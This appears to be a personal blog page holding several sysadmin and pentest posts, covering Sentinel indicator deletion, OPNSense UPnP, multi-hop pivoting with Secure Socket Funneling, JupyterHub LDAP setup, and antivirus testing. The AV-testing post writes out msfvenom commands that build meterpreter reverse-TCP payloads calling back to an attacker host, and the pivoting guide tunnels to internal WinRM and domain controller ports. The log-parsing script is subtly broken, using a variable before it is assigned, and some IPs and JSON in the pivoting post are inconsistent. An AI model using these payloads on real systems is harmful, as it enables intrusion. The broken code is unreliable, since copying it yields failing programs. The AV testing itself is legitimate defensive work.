Luz Luz

Bulk Deleting Microsoft Sentinel Threat Intelligence Indicators by Source

Microsoft hasn't implemented a way to bulk delete indicators into Sentinel which might be an issue if you have conneted to a very noisy feed. This code runs in a Jupyter notebook but if you want to run it standalone you will need to change or remove tqdm (progress bar). The progress bar doesn't show actualy progress, it just moves to indicate "something" is happening.

Microsoft hasn't implemented a way to bulk delete indicators into Sentinel which might be an issue if you have conneted to a very noisy feed. This code runs in a Jupyter notebook but if you want to run it standalone you will need to change or remove tqdm (progress bar). The progress bar doesn't show actualy progress, it just moves to indicate "something" is happening.

I am not using the "nextLink" to iterate as it doesn't seem to function correctly using the the "queryIndicators" API endpoint. It's not an issue here as each query should return results that aren't deleted.

The code "works" but there are a number of things that could be improved or fixed. I've succesfully used but I'd recommend understanding Python. Use at your own risk.

import pendulum
from msal import ConfidentialClientApplication
from tqdm.notebook import tqdm
import httpx
import random
import asyncio
import json
import urllib

client_secret = ""
client_id = ""
tenant_id = ""
api_version = "2024-01-01-preview"
subscription = ""
resource_group = ""
workspace = ""
sources_to_delete = []

api_target = f"https://management.azure.com/subscriptions/{subscription}/resourceGroups/{resource_group}/providers/Microsoft.OperationalInsights/workspaces/{workspace}/providers/Microsoft.SecurityInsights/threatIntelligence/main/queryIndicators?api-version={api_version}"
json_body = {
    "sources": sources_to_delete,
    "pageSize": 100,
}
token_issued = pendulum.now()
token_expires = token_issued.subtract(minutes=1)
issued_token = None

app = ConfidentialClientApplication(
    client_id, client_secret, authority=f"https://login.microsoftonline.com/{tenant_id}"
)


def get_token():
    global issued_token
    global token_expires

    if token_expires <= pendulum.now().add(minutes=5):
        print("Refreshing token.")
        issued_token = app.acquire_token_for_client(
            scopes=["https://management.azure.com/.default"]
        )
        token_expires = pendulum.now().add(seconds=issued_token["expires_in"])
        print(f"New expiry: {token_expires.to_iso8601_string()}")
    return issued_token

token = get_token()


def random_bar(bar):
    bar.n = 0 + random.randint(0, 100)
    bar.refresh()
    bar.set_description(random.choice(["Working hard", "Hardly working"]))
headers = {"Authorization": f"Bearer {get_token()['access_token']}"}


bar = tqdm(total=100)


async def delete_indicator(indicator):

    async with httpx.AsyncClient() as client:
        headers = {"Authorization": f"Bearer {get_token()['access_token']}"}

        r_delete = await client.delete(
            f"https://management.azure.com{indicator}?api-version={api_version}",
            headers=headers,
            # params=params,
        )
        r_delete.raise_for_status()


async def gather_deletes(indicators):
    current_indicators = set()
    random_bar(bar)
    bar.set_description(f"Seen {len(seen_indicators)}")
    for indicator in indicators["value"]:
        if indicator["id"] in seen_indicators:
            continue
        seen_indicators.add(indicator["id"])
        current_indicators.add(indicator["id"])

    async with asyncio.TaskGroup() as tg:
        for indicator in current_indicators:
            tg.create_task(delete_indicator(indicator))


async def do_deletes(payload):
    await gather_deletes(payload)

    if "nextLink" in payload:

        r = httpx.post(api_target, headers=headers, json=json_body)

        await do_deletes(r.json())


r = httpx.post(api_target, headers=headers, json=json_body)

await do_deletes(r.json())
bar.close()

A correction to a previous note, indicators are not deleted or deactivated in the 'ThreatIntelligenceIndicator'. You should ensure your retention period on the 'ThreatIntelligenceIndicator' table is 30 days. Once an indicator is removed, it will not updated in this table and be removed after this period. Existing indicators should continue to generate new entries in this table

Read More
guides Luz guides Luz

OPNSense UPnP

Configuring UPnP on OPNSense for many is likely not as straightforward as installing the UPnP service.

Configuring UPnP on OPNSense for many is likely not as straightforward as installing the UPnP service.

While this may open unnecessary ports, this is what my final state was for functional UPnP.

1. Disable IGMP Snooping on your client network(s)

2. Install the UPnP plugin (os-upnp) from System->Firmware

3. Change UPnP to default-deny due to security issues

- Add an allow rule for the required hosts e.g. `allow 1024-65535 192.168.1.10 1024-65535`

4. Firewall->Rules->Your Client Network add

- Rule 1

- Interface: Your client network interface

- Direction: in

- Protocol: UDP

- Source: Clients requiring UPnP

- Destination Port: 1900

- Destination: 239.255.255.250/32

- Rule 2

- Interface: Your client network interface

- Direction: in

- Protocol: UDP

- Source: Clients requiring UPnP

- Destination Port: 5351

- Rule 3

- Interface: Your client network interface

- Direction: in

- Protocol: TCP

- Source: Clients requiring UPnP

- Destination Port: 2189

If this is a Windows device (which is recommended, I suggest limiting to gaming consoles) then you're AntiVirus Firewall may be causing issues.

You also need to set the client devices to use static port mappings - use Hybrid NAT for the least impact on your network's security.

Read More
pen testing, guides Luz pen testing, guides Luz

Multi-Host and OS Pivoting Using Secure Socket Funneling

During some recent self-study, I encountered a scenario where I wanted to use WinRM on a machine and couldn't from Kali due to the limitations of Powershell Core. The target machine was also two pivots deep, so I needed a way to move through those networks to connect to WinRM.

During some recent self-study, I encountered a scenario where I wanted to use WinRM on a machine and couldn't from Kali due to the limitations of Powershell Core. The target machine was also two pivots deep, so I needed a way to move through those networks to connect to WinRM.

My VPN was running on Kali, and while I could disconnect it and switch to a Windows machine, I still wanted tools on Kali to be available.

Secure Socket Funneling (SSF) to the rescue.

But first, an example of what the environment looks like.

Network Layout

This a sample of what the network looks like. Hopefully it's not too difficult to follow.

  • Windows Machine
    • VM Network 192.168.11.3
  • Kali Machine
    • VM Network 192.168.11.4
    • VPN Network 10.0.1.14
  • Target Environment Host A - Linux
    • External IP 10.0.0.100
    • Internal IP 172.16.1.100
  • Target Environment Host B - Windows - this machine is running OpenSSH.
    • Internal IP 172.16.1.5
  • Target Host C
    • Internal IP 172.16.2.20
  • Kali can connect to Host A only.
  • Host A can connect Host B only.
  • Host A is firewalled and can't listen on on any extra ports on 10.0.0.100

Setting up the SSF Daemons

SSF binaries: https://securesocketfunneling.github.io/ssf/#download

Host B

We need to get SSF onto the machine, so grab the Windows binaries from the SSF website. We can these over using SCP.

To do this, we need to jump via Host A. Assuming we have some way of unzipping on the Windows machine, perform the following:

scp -J root@10.0.0.100 ./ssf-windows.zip user@172.16.1.5:

If we don't have an easy way to unzip the file, you can recursively the directory over using the following:

scp -r -J root@10.0.0.100 ./ssf-windows/extracted/ user@172.16.1.5:

If the host weren't running OpenSSH, you would need to use another method such as WinRM using this same process.

Once complete, we can now ssh in and set up the daemon by doing the following:

ssh -J root@10.0.0.100 user@172.16.1.5

Then followed by kicking off the ssfd daemon to listen on port 63000:

Expand-Archive ssf-windows.zip
cd .\extracted
.\ssfd -p 63000

Host A

For Host A, grab the Linux binaries and them over. This process is the same as Host B but without the jump host '-J' option.

In this scenario, due to the firewall, we only listen on localhost.

scp ./ssf-windows.zip root@10.0.0.100
ssh root@10.0.0.100
./ssfd -p 63000 -l 127.0.0.1

Kali Machine

Since we need to get the traffic through to Host A, we'll use ssh local port forwarding to get around the firewall issue.

The below command sets up ssh to listen on 1111 and forward it to 63000 on Host A:

ssh -L 1111:127.0.0.1:63000 root@10.0.0.100

Now we set up ssfd on our Kali host. Unzip SSF on Kali and from within the extracted folder run:

./ssfd -p 63000

If you have an SSH server running on your Kali host, you could use SSH forwarding from Windows, but I think that's a bit messier.

Windows Machine

SSF supports routing via several intermediate hosts. To do this, we configure the below JSON config file:

{
  "ssf": {
    "circuit": [
      {"host": "192.168.11.4", "port":"63000"},
      {"host": "127.0.0.1", "port":"1111"}
    ]

    }
  }
}

This config does the following

  1. Connects to Kali
  2. Connect to Host A via localhost on Kali (the SSH local port forward)

Info on configuring the relay hosts can be found at https://securesocketfunneling.github.io/ssf/#how-to-use-relay-servers

Host B is the last hop, so we don't need it in the config. To connect, we run the following:

.\ssf.exe -c config.json -D 9000 -p 63000 172.16.1.5

We now have dynamic port forwarding on the Windows machine listening on port 9000, which is essentially a socks proxy. Dynamic port forwarding isn't necessarily what we want as we need WinRM. With SSF, you can perform both TCP and UDP forwarding.

We can set up SSF to forward to the WinRM HTTP port on 5985:

.\ssf.exe -c .\c.json -L 6666:172.16.2.5:5985 172.16.1.20 -p 63000

And now we can finally connect to WinRM:

$s = New-PSSession -Port 6666 -ComputerName 127.0.0.1 -Credential 'username'
Enter-PSSession $s

Local UDP/TCP Forwarding Example and Notes

I don't think it's evident in the SSF docs, but you can perform multiple forwards much like SSH, and you can forward both UDP and TCP for the same port.

Here's an example of forwarding some Domain Controller ports to a Windows host on Kali a lot of the UDP ports aren't requried but I assembled this with regex and it was easier.

./ssf  -L 445:172.16.2.5:445 -U 445:172.16.2.5:445 -L 636:172.16.2.5:636 -U 636:172.16.2.5:636 -L 389:172.16.2.5:389 -U 389:172.16.2.5:389 -L 464:172.16.2.5:464 -U 464:172.16.2.5:464 -L 139:172.16.2.5:139 -U 139:172.16.2.5:139 -L 135:172.16.2.5:135 -U 135:172.16.2.5:135 -L 593:172.16.2.5:593 -U 593:172.16.2.5:593 -L 3268:172.16.2.5:3268 -U 3268:172.16.2.5:3268 -L 3269:172.16.2.5:3269 -U 3269:172.16.2.5:3269 -L 88:172.16.2.5:88 -U 88:172.16.2.5:88 -L 137:172.16.2.5:137 -U 138:172.16.2.5:138  -p 63000 172.16.1.20

With the above, you could run enum4linux or crackmapexec against 127.0.0.1. Note that you may need to also provide a DC IP for some commands that talk to Kerberos. Check your command's options and if this is required, set it to 127.0.0.1 in addition.

And that's it.

The SSF docs are available at https://securesocketfunneling.github.io/ssf/#home

Depending on the environment, a lot of this can be achieved using SSH forwarding.

Read More
guides, snippets Luz guides, snippets Luz

Extracting Public IPs from an Azure Tenant

A one-liner that extracts all Public IPs (PIPs) assigned in your Azure tenant.

The below one-liner allows you to extract all Public IPs (PIPs) assigned in your Azure tenant. Please note that this only covers PIPs and not address prefixes and other resources. You can easily modify the command to output other resources though.

# Output to console
Get-AzSubscription | ForEach-Object {Set-AzContext -Subscription $_.Name *>$null; Get-AzPublicIpAddress} | Where-Object {$_.IpAddress -ne 'Not Assigned'} | Select-Object -Property Name,PublicIpAllocationMethod,ipAddress,ProvisioningState,Location,ResourceGroupName,Id

and

# Write to CSV
Get-AzSubscription | ForEach-Object {Set-AzContext -Subscription $_.Name *>$null; Get-AzPublicIpAddress} | Where-Object {$_.IpAddress -ne 'Not Assigned'} | Select-Object -Property Name,PublicIpAllocationMethod,ipAddress,ProvisioningState,Location,ResourceGroupName,Id  | Export-Csv -Path .\pips.txt
Read More
python, snippets Luz python, snippets Luz

Setting up JuyterHub for AD (or LDAP) Authentication

Covering basic config for AD and Jupyter

This is reasonably straight forward - you might get caught with an issue with the following though

c.LDAPAuthenticator.bind_dn_template

Here is the config

c.LDAPAuthenticator.lookup_dn_search_user = 'service_account'
    c.LDAPAuthenticator.lookup_dn_search_password = 'password'
    c.JupyterHub.authenticator_class = 'ldapauthenticator.LDAPAuthenticator'
    c.LDAPAuthenticator.server_address = 'ldap://server'
    c.LDAPAuthenticator.bind_dn_template = 'domain\{username}'
    c.LDAPAuthenticator.lookup_dn = False
    c.LDAPAuthenticator.user_search_base = 'OU=Corporate Services,OU=Users,OU=Agencies,DC=domain,DC=sub,DC=tld'
    c.LDAPAuthenticator.user_attribute = 'sAMAccountName'
    c.LDAPAuthenticator.allowed_groups = []
    c.Spawner.default_url = '/lab'
    c.Spawner.notebook_dir = '~'
    c.JupyterHub.spawner_class = 'systemdspawner.SystemdSpawner'
    c.SystemdSpawner.default_shell = '/usr/bin/zsh'
    c.SystemdSpawner.username_template = 'jupyter-{username}'
    c.SystemdSpawner.unit_name_template = 'jupyter-singleuser'
    c.SystemdSpawner.disable_user_sudo = False
    c.SystemdSpawner.dynamic_users = True
    def start_user(spawner):
        import os, pwd, grp
        username = spawner.user.name
        path = os.path.join('/usr/share/notebooks', username)
        if not os.path.exists(path):
                os.mkdir(path, 0o755)
                uid = pwd.getpwnam(username).pw_uid
                gid = grp.getgrnam(username).gr_gid
                os.chown(path, uid, gid)
Read More
guides, pen testing Luz guides, pen testing Luz

Testing AVs With Simple Vectors

Having had the need to run some tests against prospective AV vendors, I have performed some simple tests using Metasploit payloads and Mimikatz. In this post, I will go over the techniques used and how to employ them.

Having had the need to run some tests against prospective AV vendors, I have performed some simple tests using Metasploit payloads and Mimikatz. In this post, I will go over the techniques used and how to employ them.

To kick off I generated a basic executable meterpreter with simple encoding and no encryption.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.1.1.2 LPORT=4444 -o meterpreter.exe -f exe --encoder x64/xor_dynamic --platform windows --arch x64 

The options used are:

  • -p the payload to use.
    LHOST & LPORT – these are the Metasploit options which are set in msf using “set OPTION value”. In this case, the attacking host and attacking port because all payloads used are reverse TCP payloads (the victim host connecting back to the attacking machine as opposed to the attacking machine connecting to the victim).

  • -o the output file.

  • -f the format to use. Use raw when generating script payloads (or the language name e.g. python) to get the native code. There are options to transform payloads but I will not be covering this.

  • -p the target platform. Generally not needed for scripting languages like Python.

  • –arch the target platform architecture. Generally not needed for scripting languages like Python.

Within Metasploit, I kicked off the listener. This will be common to all generated payloads so I will not be repeating it. Just note that the payload and port will need to change depending on what is generated with msfvenom.

use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
SET LPORT 4444

As expected this was detected without issue, no surprise there.

I generated a few more payloads using various languages. A lot of these can be shimmed into the environment without requiring an install making them viable vectors.

Java – detected – Requires JVM or JSK. Execute with java – jar file.jar

msfvenom -f raw -p payload/java/meterpreter/reverse_tcp  LHOST=10.1.1.2 LPORT=4443 -o payload.jar
Read More
guides, python Luz guides, python Luz

Parsing Arbitrary Log Data for Logs Per Second and Size Datav

I recently encountered a scenario requiring me to parse some data that was not available during a proof-of-concept and in a non-standard format. There may be a multitude of tools and approaches to achieve this but the fastest I could think of at the time was by using Python.

I recently encountered a scenario requiring me to parse some data that was not available during a proof-of-concept and in a non-standard format. There may be a multitude of tools and approaches to achieve this but the fastest I could think of at the time was by using Python.

Here are the steps I took to begin processing this data.

  1. Analyse the log source data and figure out what contents I needed to achieve my objective.

    • The file structure made this easy as a single day was represented in the filename. Luckily my use case didn’t require localising the timezone as the data was in UTC.
      FileName.@2020010100001TZDATA.extension

  2. My next step was to analyse the file contents to detect what and where the data I needed was.

    • Super simple – I only needed the data and this was right at the beginning of the file and was space-delimited:
      1560053187.668 ....
      There was some extra data in each file’s header describing the source and structure and was prefixed with a #

Well, that was easy, even if it wasn’t we would have found a way with the power of Python.

Let’s get started.

# I didn't know I'd need these imports when I started so don't be detered.
from datetime import datetime
from collections import Counter
from statistics import mean
import operator

# Definitely knew I needed these.
import os
import re
import csv
import sy

# I'm going to regex the filenames for the specified date so I'll compile a regex match.
file_match = re.compile('^FileName\.\@20190610.*') # Starts with FileName.@ + Date I Want + Whatever

# The data I needed was in two folders so I created an array with the paths in case I needed to re-use the code.
data_folders = ['X:/Folder1', 'X:/Folder2']

# Set the file size count to zero.
total_size = 0

# Because I want to use the data_folders variable the definable variable I setup a dict to add the folders to. I will later use this dict to perform all my operations on. I really need to learn pandas.
directories = {}
So we’ve set up everything we need to reference the data and work with what we need. We have to start iterating, matching, and all that fun stuff.
# Move through folders
for data_folder in data_folders:
    # Add the folder dict to the root dict gigitty
    directories[data_folder] = {}
    # List folder contents
    for file in os.listdir(data_folder):
        # Get files matching our defined string
        if file_match.match(file):
            # Add the matched file' size to total size
            total_size += os.path.getsize(data_folder+'/'+file)
            # Open the file for reading
            with open(data_folder+'/'+file) as logfile:
                # Read as CSV
                time_line = csv.reader(logfile, delimiter=' ')
                # Set base values for iterations
                second = 0
                count = 0
                started = 0
                # Iterate through each row in file
                for row in time_line:
                    # Create matches to match against entries to avoid weird s!*%
                    comment_match = re.compile('^#.*')
                    int_match = re.compile('^\d.*')
                    # Check the line against the above matches
                    if not comment_match.match(row[0]) and int_match.match(row[0]):
                        # Convert the UNIX epoch to a datetime object
                        second = dt.second
                        hour = str(dt.hour)
                        minute = str(dt.minute)
                        # second = str(dt.second)
                        dt = datetime.fromtimestamp(float(row[0]))
                        current_time = "{0}:{1}:{2}".format(hour, minute, str(second))
                        # If the second has changed reset the acount and update the current second
                        if second == dt.second:
                            count += 1
                        else:
                            directories[data_folder][current_time] = count
                            second = dt.second
                            count = 0
                    
# Create and empty counter dict object and then start adding the calculated data together.
second_count_results = Counter({})
for directory, times in directories.items():
    second_count_results += Counter(times)

# Calculate the total size of the logs together.
total_log_size_mb = total_size * 0.000001
    
# Max logs per second that we encountered.
max_lps = max(second_count_results.items(), key=operator.itemgetter(1))[1]
# Minimum logs per second that we encountered.
min_lps = min(second_count_results.items(), key=operator.itemgetter(1))[1]
# Find the average LPS.
list_of_lps = [v for k, v in second_count_results.items()]
average_lps = mean(list_of_lps)


# Print to STDIO the data we figured out in our heads.
print('Max lps observed: ' + str(max_lps) + ' min lps observed: ' + str(min_lps))
print('Size of the date we caclulated: ' + str(total_log_size_mb))
print('Average LPS was: ' + str(average_lps))

# Print and save the results.
with open('proxy_lps_data.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    for increment in sorted(second_count_results.items()):
        timestamp = str(increment[0])
        count = str(increment[1])
        writer.writerow([timestamp, str(count)])
        print(timestamp + ': ' +  str(count))

# Save the calculation metdata.
with open('proxy_metrics_data.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerow(['size', str(total_log_size_mb)])
    writer.writerow(['min_lps', str(min_lps)])
    writer.writerow(['max_lps', str(max_lps)])
    writer.writerow(['avg_lps', str(average_lps)])
Read More